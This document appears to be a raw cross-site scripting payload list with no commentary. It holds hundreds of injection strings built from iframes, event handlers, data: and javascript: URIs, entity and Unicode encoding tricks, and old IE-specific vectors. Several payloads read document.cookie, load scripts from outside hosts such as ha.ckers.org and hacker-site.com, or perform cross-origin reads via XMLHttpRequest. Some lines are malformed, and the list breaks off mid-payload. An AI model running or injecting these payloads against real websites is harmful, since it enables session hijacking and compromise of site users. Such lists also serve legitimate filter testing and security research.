<head><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
<HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
<HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7"> </HEAD><SCRIPT>alert(‘XSS’);</SCRIPT>
Hello @Html.Raw(MyValue)
Hello <%= MyValue =>
<! — Hello — world > <SCRIPT>confirm(1)</SCRIPT> →
href=[0x0b]” onclick=alert(1)//
href= action= formaction= location= on*= name= background= poster= src= code= data=
href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4g>
href=”data:text/html&comma;&lt;script&gt;alert(document.domain)&lt
href=javascript:alert(1)
“ href=javascript:alert(1)
href=javascript:alert(1)//>Click</a>
“ href=javascript:alert(1) <math><!V
href=vjavascript:alert(1)//v>Click</a>
</html>
</HTML>
<;HTML>;<;BODY>;
<HTML><BODY>
<HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”>
<HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;”></BODY></HTML>
<HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;”></BODY></HTML>
<HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;”></BODY></HTML><HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>alert(“XSS”)</SCRIPT>”></BODY></HTML>
<HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>alert(‘XSS’)</SCRIPT>”> </BODY></HTML>
<html><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>”></BODY></html>
<html data-toggle=tab href=”<img src=k onerror=alert(66)>”>
<html><noalert><noscript>(123)</noscript><script>(123)</script>
<html><noalert><noscript>(XSS)</noscript><script>(XSS)</script>
<html onMouseDown html onMouseDown=”javascript:javascript:alert(1)”></html onMouseDown>
<html onMouseEnter html onMouseEnter=”javascript:parent.javascript:alert(1)”></html onMouseEnter>
<html onMouseLeave html onMouseLeave=”javascript:javascript:alert(1)”></html onMouseLeave>
<html onmousemove html onmousemove=”javascript:javascript:alert(1)”></html onmousemove>
<html onMouseMove html onMouseMove=”javascript:javascript:alert(1)”></html onMouseMove>
<html onMouseOut html onMouseOut=”javascript:javascript:alert(1)”></html onMouseOut>
<Html Onmouseover=(alert)(1) //
<html onmouseover html onmouseover=”javascript:javascript:alert(1)”></html onmouseover>
<html onMouseOver html onMouseOver=”javascript:javascript:alert(1)”></html onMouseOver>
<html onMouseUp html onMouseUp=”javascript:javascript:alert(1)”></html onMouseUp>
<html onMouseWheel html onMouseWheel=”javascript:javascript:alert(1)”></html onMouseWheel>
<html ontouchcancel=alert(1)>
<html ontouchend=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<html ontouchmove=alert(1)>
<html ontouchstart=alert(1)>
<html ontouchstart=alert(1)>
<html:script>javascript:alert(1);</html:script></html:html>
</html></script> // XML inside JS
htmlspecialchars($_REQUEST[q], ENT_QUOTES);
htmlStr = ‘<a href=”’+*dataentities*+’javascript:123">test</a>’; document.getElementById(‘placeholder’).innerHTML = htmlStr; try { if(document.getElementById(‘placeholder’).firstChild.protocol === ‘javascript:’) { customLog(*dataentities*); } }catch(e){};
htmlStr = ‘<a href=”javascript’+*dataentities*+’:123">test</a>’; document.getElementById(‘placeholder’).innerHTML = htmlStr; try { if(document.getElementById(‘placeholder’).firstChild.protocol === ‘javascript:’) { customLog(*dataentities*); } }catch(e){};
htmlStr = ‘<a href=”javascript’+*dataentities*+’123">test</a>’; document.getElementById(‘placeholder’).innerHTML = htmlStr; try { if(document.getElementById(‘placeholder’).firstChild.protocol === ‘javascript:’) { customLog(*dataentities*); } }catch(e){};
<html><title>{alert(‘xss’)}</title></html>
<;HTML xmlns:xss>;
<HTML xmlns:xss>
<HTML xmlns:xss><?import namespace=”xss” implementation=”%(htc)s”>
<HTML xmlns:xss><?import namespace=”xss” implementation=”%(htc)s”><xss:xss>XSS</xss:xss></HTML>”””,”XML namespace.”),(“””<XML ID=”xss”><I><B>&lt;IMG SRC=”javas<! — →cript:javascript:alert(1)”&gt;</B></I></XML><SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
<HTML xmlns:xss><?import namespace=”xss” implementation=”http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
<HTML xmlns:xss><?import namespace=”xss” implementation=”http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss</html>
<HTML xmlns:xss><?import namespace=”xss” implementation=”http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>
);HTP.PRINT(:1); —
);HTP.PRINT(:1); — =pwned<svg/onload=prompt(‘XSS\u0020via\u0020sql\u0020injection’)>
“h”+”t”+”t”+”p”,
“h”+”t”+”t”+”p”A
http://a/%%30%30
http://aa<script>alert(123)</script>
http://aa'><script>alert(123)</script>
http://aa"><script>alert(123)</script>
@brutelogic.com.br/webgun/test.php?p=”>http://alert(1)@brutelogic.com.br/webgun/test.php?p=<svg+onload=eval(URL.slice(7,15))>
http://brutelogic.com.br/webgun/test.php?p=<brute id=test onmouseover=alert(1)>AAAA
http://brutelogic.com.br/webgun/test.php?p=<brute onmouseover=pop(1)>AAAA
http://brutelogic.com.br/webgun/test.php?p=<script src=//3334957647/1>
http://domain/page?p=%26p=%26lt;svg/onload=alert(1)%3E%3Cj%20onclick=location%2B=document.body.textContent%3Eclick%20me![BODY_CONTENT]&p=<svg/onload=alert(1)>click me!
http://domain/page?p=%26p=%26lt;svg/onload=alert(1)><j%20onclick=location%2B=document.body.textContent>click%20me![BODY_CONTENT]&p=<svg/onload=alert(1)>click me!
http://domain/page?p=%3Cj%20onclick=location%2B=textContent%3E%26p=%26lt;svg/onload=alert(1)%3E&p=<svg/onload=alert(1)>
http://domain/page?p=%3Cj%26p=%3Csvg%2Bonload=alert(1)%20onclick=location%2B=outerHTML%3Eclick%20me!<j&p=<svg+onload=alert(1) onclick=location+=outerHTML>
http://DOMAIN/PAGE.php/"><svg onload=alert(1)>
http://domain/page?p=<j%20onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)>&p=<svg/onload=alert(1)>
http://domain/page?p=<j%26p=<svg%2Bonload=alert(1)%20onclick=location%2B=outerHTML>click%20me!<j&p=<svg+onload=alert(1) onclick=”location+=outerHTML”>
http://domain/page?p=<script/src=//3237054390/1+
http://domain/page?p=<svg/onload=alert(1)>
http://domain/page?p=<svg/onload=alert(1)+
http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD
@brutelogic.com.br/webgun/test.php?p=”>http://javascript:alert(1)@brutelogic.com.br/webgun/test.php?p=<svg+onload=location=URL.slice(7,26)>
<http://onxxx%3D1/
<http://onxxx%3D151/
http://...?p=<script/src=//brutelogic.com.br/1+
http://...?p=<svg/onload=alert(1)+
http(s)://host/page?p=XSS
http://target.com/something.jsp?inject=<script>eval(location.hash.slice(1))</script>#alert(1)
http://target.com/something.xxx?a=val1&a=val2
http://window.open (“http://tpc.googlesyndication.com/safeframe/1-0- K”,”1;25;<svg/onload=alert(/XSS/)>true”)
http://www.google<script .com>alert(document.location)</script
http://www.google<script .com>confirm(document.location)</script
http://www.<script abc>setTimeout(‘confirm(1)’,1)</script .com>
http://www.<script>alert(1)</script .com
http://www.<script>confirm(1)</script .com
http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??
http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS??
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=><img src=x onerror=prompt(0);>
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=v><img src=x onerror=prompt(0);>
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS
HYPERLINK TAG INJECTION:
(i=0;i<100;)
@i\6d\70o\72\74'javascr\ipt:alert(document.cookie)’;
i = document.createElement(input);
id=XSS SRC=<IMG 6;avascript:alert(‘XSS’)>
id=xss style=overflow:scroll>
if(1)confirm(1)}{
if(/*@cc_on!@*/0==1){alert(1);}else{alert(2);}</script>
<;! — [if gte IE 4]>;
<! — [if gte IE 4]>
<! — [if gte IE 4]><SCRIPT>alert(‘XSS’);</SCRIPT><![endif] →
<! — [if gte IE 4]> <SCRIPT>alert(‘XSS’);</SCRIPT> <![endif] →
<! — [if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif] →
<! — [if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif] →
<! — [if IE]><img src=# width=0 height=0 onerror=alert(/insight-labs/)><![endif] →
<! — [if IE]><img src=# width=0 height=0 onerror=alert(/ourren_demo/)><![endif] →
<![if<iframe
<![if<iframe/onload=alert(1)//]>
<![if<iframe/onload=vbs::alert[:]>
<! — [if<img src=x onerror=alert(2)//]> →
<! — [if<img src=x onerror=javascript:alert(1)//]> →
<! — [if<img src=x:x onerror=confirm(5)//] →
<ifra<ifame>me>…</ifra</iframe>me>
<iframe/%00/ src=javaSCRIPT&colon;alert(1)
<iframe/%00/ src=javaSCRIPT&colon;confirm(1)
<iframe %00 src=”&Tab;javascript:prompt(1)&Tab;”%00>
<iframe%0Aname=”javascript:\u0061\u006C\u0065\u0072\u0074(1)”
<iframe%0Aname=”javascript:\u0061\u006C\u0065\u0072\u0074(1)” %0Aonload=”eval(name)”;>
“><iframe%20src=”http://google.com"%%203E
<IFRAME%20src=’javascript:confirm%26%23x25;281)’>
iframe.contentWindow.location.constructor.prototype
</iframe><form method=post action=LOGIN_URL>
<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById(‘ifra’); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, ‘Safe’, {value:{}}); foo(Safe, ‘get’, {value:function() { return document.cookie }}); alert(Safe.get());</script>
<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById(‘ifra’); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, ‘Safe’, {value:{}}); foo(Safe, ‘get’, {value:function() { return document.cookie }}); alert(Safe.get());</script>
<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById(‘ifra’); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, ‘Safe’, {value:{}}); foo(Safe, ‘get’, {value:function() { return document.cookie }}); confirm(Safe.get());</script>
<iframe id=t:alert(1) name=javascrip onload=location=name%2bid>
<iframe id=XSS / /onload=alert(/XSS/)></iframe>
<iframe id=XSS / “onload=alert(/XSS/)></iframe>
<iframe id=XSS “onload=alert(/XSS/)></iframe>
<iframe id=XSS///////onload=alert(/XSS/)></iframe>
<iframe id=XSS <?php echo chr(11)?> onload=alert(/XSS/)></iframe>
<iframe id=XSS <?php echo chr(12)?> onload=alert(/XSS/)></iframe>
<IFRAME id=XSS SRC=”javascript:alert(‘XSS’); <
<IFRAME id=XSS SRC=”javascript:alert(‘XSS’);”></IFRAME>
<iframe><iframe src=javascript:alert(/@jackmasa/)></iframe>
<iframe><iframe src=javascript:confirm(4)></iframe>
<IFRAME name=”F1" src=”http://target/#<SCRIPT>var secret=’1232';”></IFRAME>
<IFRAME name=”F2" src=”http://target/#<SCRIPT>var secret=’1233';”></IFRAME>
<IFRAME name=”F3" src=”http://target/#<SCRIPT>var secret=’1234';”></IFRAME>
<iframe/name=”if(0){\u0061lert(1)}else{\u0061lert(1)}”/onload=”eval(name)”;>
<iframe name=javascript:alert(1) src=http://www.target.com/?xss=<svg/onload=location=name//>
<iframe/name=”javascript:confirm(1);”onload=”while(1){eval(name);}”>
<iframe ng-src=javascript:..>
<iframe onbeforeload iframe onbeforeload=”javascript:javascript:alert(1)”></iframe onbeforeload>
<iframe onload=%22write(‘<script>’%2Blocation.hash.substr(1)%2B’</script>’)%22></iframe>#var xhr = new XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
<iframe onload=%22write(‘<script>’%2Blocation.hash.substr(1)%2B’</script>’)%22></iframe>#var xhr = new XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
“><iframe/onload=alert(1)>
<iframe onload=”alert(1)”></iframe>
<iframe/onload=alert(document.domain)></iframe>
<iframe/onload=alert(/INJECTX/)>
<iframe onload iframe onload=”javascript:javascript:alert(1)”></iframe onload>
<iframe onLoad iframe onLoad=”javascript:javascript:alert(1)”></iframe onLoad>
<iframe onload=popup=1;>
<iframe/onload=’this[“src”]=”javas&Tab;cript:al”+”ert``”’;>
<iframe/onload=’this[“src”]=”javas&Tab;cript:al”+”ert``”’;
<iframe/onreadystatechange=alert(1)
<iframe/onreadystatechange=confirm(1)
“><iframe/onreadystatechange=confirm(1)
<iframe onReadyStateChange iframe onReadyStateChange=”javascript:javascript:alert(1)”></iframe onReadyStateChange>
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074(‘\u0061’) worksinIE>
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074(‘\u006worksinIE>
<iframe<?php echo chr(11)?> onload=alert(‘XSS’)></iframe>
<iframe<?php echo chr(11)?> onload=alert(‘XSS’)></iframe>
“></iframe><script>alert(123)</script>
“></iframe><script>alert(123)</script>
“></iframe><script>alert(document.cookie);</script>
“></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder=”0%EF%BB%BF
<iframesrc=&#039;http://www.target.com?foo="xss autofocus/AAAAA
<iframesrc=&#039;http://www.target.com?foo="xss autofocus/AAAAA onfocus=location=window.name//&#039;
<iframe/src=%&#050f&#x2fben.mario#%0Anew%20alert%20`3`;width=1 height=1 style=visibility:hidden;/>
<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open(‘GET’,’http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<iframe src=&#74avascript&colon;aler&#x74(53)>
<iframe/src=about:blank onload=alert(1)>
<iframe src=”//brutelogic.com.br/tests/status.html” onload=”frames[0].postMessage(‘<script>alert(document.domain)’,’*’)”>
<iframe src=”data:D,<script>confirm(top.document.body.innerHTML)</script>”>
<iframe src=”data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
<iframe src=”data:message/rfc822,Content-Type: text/html;%0aContent-Transfer-Encoding: quoted-printable%0a%0a=3CSCRIPT=3Econfirm(document.location)=3C/SCRIPT=3E”></iframe>
<iframe src=\”data:),<script>alert(document.domain)</script>”></iframe>
<iframe/src=”data:text/html,
<iframe src=”data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E”></iframe>
<iframe src=”data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E”></iframe>
<IFRAME/SRC=DATA:TEXT/HTML;BASE64,ICA8U0NSSVBUIC8NU1JDPSINSFRUUFM6DS8NDS8NSEVJREVSSS5DSC96DSINID4NPC9TQ1JJUFQNDT5>
<iframe src=”data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4=”/>
<iframe src=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></iframe> (Firefox, Chrome, Safari)
<iframe src=”data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;”></iframe>
<iframe/src=”data:text/html&p=<svg/onload=alert(49)>”>
<iframe src=”data:text/html,<script>alert(0)</script>”></iframe> (Firefox, Chrome, Safari)
<iframe/src=”data:text/html,<svg%09%0A%0B%0C%0D%A0%00%20onload =confirm(1);>”;>
<iframe src=”data:text/html,<svg &#111;&#110;load=alert(1)>”>
<iframe/src=”data:text/html,<svg &#111;&#110;load=alert(1)>”>
<iframe/src=”data:text/html,<svg &#111;&#110;load=confirm(1)>”>
<iframe/src=”data:text/html,<svg onload=alert(1)>”>
<iframe/src=”data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==”>
<iframe/src=”data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==”>
<Iframe / src = “data: text & sol; html; & Tab; base64 & NewLine;, PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg ==”>
<iframe srcdoc=%26lt;svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>
<iframe srcdoc=’&lt;body onload=prompt&lpar;1&rpar;&gt;’>
<iframe srcdoc=”&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>”>
<iframe srcdoc=\”&lt;iframe srcdoc=’&amp;lt;iframe onload=alert(1)&amp;gt;’&gt;\”></iframe>
“><iframe srcdoc=”&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;”>
<iframe srcdoc=”&lt;script&gt;alert(1)&lt;/script&gt;”></iframe>
<iframe srcdoc=’&lt;svg/onload=alert(1)&gt;’>
<iframe srcdoc=’&lt;svg/onload=alert(/@80vul/)&gt;’>
<iframe srcdoc=’&lt;svg/onload=confirm(3)&gt;’>
<iframe srcdoc=<svg/onload=alert(1)>>
<iframe srcdoc=”<svg onload=alert(1)&nvgt;”></iframe>
<iframe srcdoc=”<svg/onload=confirm(domain)>”>
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;173)&gt;>
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>
<iframe src=”http://0x.lv/xss.swf"></iframe>
<IFRAME SRC=��http://hacker-site.com/xss.html��>
<IFRAME SRC=http://hacker-site.com/xss.html>
<iframe src=http://ha.ckers.org/scriptlet.html <
<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
<iframe src=”http://localhost"></iframe>
<iframe src=”http://target.com/something.jsp?inject=<script>eval(name)</script>" name=”alert(1)”></iframe>
<iframe/src=”http://www.b.com/1.swf?get-data=(function(){alert(document.cookie)})()"></iframe>
<iframe/src=”http://www.b.com/1.swf?get-data=(function(){location.href=%22javascript:'<script>alert(document.cookie)</script>'%22})()"></iframe>
“> “><iframe src=http://xss.cx onload=confirm(5) <<iframe src=a> “><iframe src=http://xss.cx onload=confirm(8) <
<iframe src=”http://xss.cx?x=<iframe name=x></iframe>”></iframe><a href=”http://xss.ms" target=x id=x></a><script>window.onload=function(){x.click()}</script>
<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open(‘GET’,’http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open(‘GET’,’http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){confirm(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
<iframe src=http://xss.rocks/scriptlet.html <
/*iframe/src*/<iframe/src=”<iframe/src=@”/onload=prompt(1) /*iframe/src*/>
/*iframe/src*/<iframe/src=”<iframe/src=@”/onload=prompt/*iframe/src*/>
<iframe src iframe src=”javascript:javascript:alert(1)”></iframe src>
<iframe src=”jar://html5sec.org/test.jar!/test.html”></iframe>
<iframe src=”jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/ — !&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e”></iframe>
<iframe src=”javascript:%61%6c%65%72%74%28%31%29"></iframe>
<IFRAME/SRC=JAVASCRIPT:%61%6c%65%72%74%28%31%29></iframe>
<IFRAME/SRC=JAVASCRIPT:%61%6c%65%72%74%28%31%29></iframe> // Cross Browser (PEPE Vila)
<iframe src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<iframe src=javascript:alert(161)>
<iframe src=”java script:alert(1)” height=0 width=0 /><iframe> <! —
<iframe src=”java script:alert(1)” height=0 width=0 /><iframe>
<iframe src=”javascript:al ert(1)” height=0 width=0 /><iframe> <! —
<iframe src=”javascript:al ert(1)” height=0 width=0 /><iframe>
→ <iframe src=java script:alert(1); height=0 width=0 /><iframe>
<iframe src=”java script:alert(1)” height=0 width=0 /><iframe> <! — Java
<iframe src=”javascript:alert(1)”></iframe>
<iframesrc=”javascript:alert(2)”>
<IFRAME SRC=”javascript:alert(29);”></IFRAME>
<iframe src=”javascript:alert(69)%%0D3C! —
<iframe src=”javascript:alert(71)%%0D3C! —
“><iframe src=javascript:alert(document.cookie); height=0 width=0 /> <iframe>
<IFR AME src=javascript:alert(‘XSnS’)></IFRA ME>
“><iframe src=”javascript:alert(XSS)”>
><iFrAmE/src=jAvAscrIpT:alert(/Xss/)>
��><iFrAmE/src=jAvAscrIpT:alert(/Xss/)>
><iFrAmE/src=jAvAscrIpT:alert(/Xss-By-Muhaddi/)>
<iframe src=”javascript:alert(‘XSS by \nxss’);”></iframe><marquee><h1>XSS by xss</h1></marquee>
><iFrAmE/src=jAvAscrIpT:alert(/xss-by-shawar/)>
<;IFRAME SRC=”;javascript:alert(‘;XSS’;);”;>;<;/IFRAME>;
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
<IFRAME SRC=”javascript:alert(XSS);”></IFRAME>
<iframe// src=javaSCRIPT&colon;alert(1)
<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
<iframe src=javascript&colon;confirm&lpar;document&period;location&rpar;>
<IFRAME SRC=”javascript:confirm(5);”></IFRAME>
“><iframe/src=javascript:co\u006efir\u006d%28 1%29>
<iframe src=”javascript:document.vulnerable=true; <
<IFRAME SRC=”javascript:document.vulnerable=true;”></iframe>
<iframe/src=’javascript:if(null==null){javascript:0?1:confirm(1);}’>
<IFRAME SRC=”javascript:javascript:alert(1);”></IFRAME>
“><iframe/src=javascript:prompt(1)>
<iframe src=”javascript:’<script src=http://xss.cx ></script>’”></iframe>
<iframe src=”javascript:’<script src=//pkav></script>’”>
<iframe src=”javascript:’<script src=>;</script>’”></iframe>
<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ?
<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&